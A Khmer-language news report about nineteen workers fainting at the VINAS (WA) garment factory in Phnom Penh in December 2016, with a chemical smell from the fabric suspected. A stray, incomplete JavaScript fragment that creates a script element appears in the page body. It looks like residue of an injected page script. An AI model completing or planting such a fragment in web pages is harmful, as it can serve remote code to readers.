Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

Update: កម្មការនីរោងចក្រកាត់ដេរ VINAS (WA)ដួលសន្លប់ជាង២០នាក់

ភ្នំពេញ:កម្មករកម្មការនីបម្រើការងារនៅរោងចក្រកាត់ដេរសម្លៀកបំពាក់(ខោទ្រនាប់អាវទ្រនាប់)WA វីន ណាស ហ្គាមេនអិលធីឌីដែលមានទីតាំងស្ថិត នៅតាមបណ្តោយផ្លូវលំក្នុងភូមិបន្លាស្អិត សង្កាត់ ឃ្មួញខណ្ឌសែនសុខ បន្ទាប់ពីកំពុងធ្ចើការងារ ស្រាប់តែ កើតមាន ភាពភ័យស្លន់ស្លោ និងថប់ដង្ហើម ធ្វើឱ្យកម្មករ-កម្មការនី ម្នាក់ៗ ភិតភ័យ ជ្រួលច្របល់រហូតដល់ដួលសន្លប់ជាបន្តបន្ទាប់១៩នាក់ក្នុងចំណោមប្រហែល៤០០នាក់កាលពីវេលាម៉ោង០៩និង៣០នាទីព្រឹកថ្ងៃទី១៩ខែឆ្នូឆ្នាំ២០១៦ នេះ ។តាមសម្តីកម្មករ ដែលរត់ចេញមកក្រៅ ទាំងអារម្មណ៍ ភ័យស្លន់ បានឱ្យដឹង ជំហានដំបូងថា មានកម្មការនីម្នាក់ចូលបន្ទប់ទឹកពេលចេញមកវិញមានអាការៈមិនស្រួលក៍ចូលសម្រាកកន្លែងពេទ្យក្នុងរោងចក្រក្រោយមកមានកម្មការនីប៉ុន្មាននាក់ទៀតក៍មានអាការៈដូចគ្នាខណ:ដែលកម្មករទូទាំងរោងចក្រកំពុងតែបំពេញការងារស្រាប់ តែឃើញបែបនេះ ធ្វើឱ្យកម្មករក្នុងរោងចក្រភិតភ័យស្លន់ស្លោរត់ចែកជើងគ្នា បង្កឱ្យ មានអ្នកដួលសន្លប់ ជាបន្តប
ន្ទាប់រហូតដល់ទៅ១៩នាក់ ។

ការដួលសន្លប់នេះត្រូវគេសង្ស័យថាបណ្តាលមកពីធុំក្លិនជាតិគីមីក្នុងក្រណាត់ព្រោះបើតាមការសាកសួរកម្មករបាននិយាយថាមុនដំបូងពួកគេធុំក្លិនក្រណាត់ក៏មានអការទន់ដៃទន់ជើងហើយដួលសន្លប់តែម្តង ។

ភ្លាមៗ ជនរងគ្រោះ ត្រូវបានតំណាង ខាងក្រុមហុ៑នដឹកតាមរថយន្តនិងអ្នកខ្លះតាមម៉ូតូរឺក៍រឺម៉កកង់បី បញ្ជូនទៅ សង្រ្គោះនៅមន្ទីរពេទ្យ ព្រះកុសុមះនិងក្លីនិកដែលជិតរោងចក្រភ្លាមៗ។

បច្ចប្បន្នកម្មការនីដែលដួលសន្លប់ខាងលើកំពុងសម្រាកព្យាបាលនៅក្នុងមន្ទីពេទ្យព្រះកុសុមះ។

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More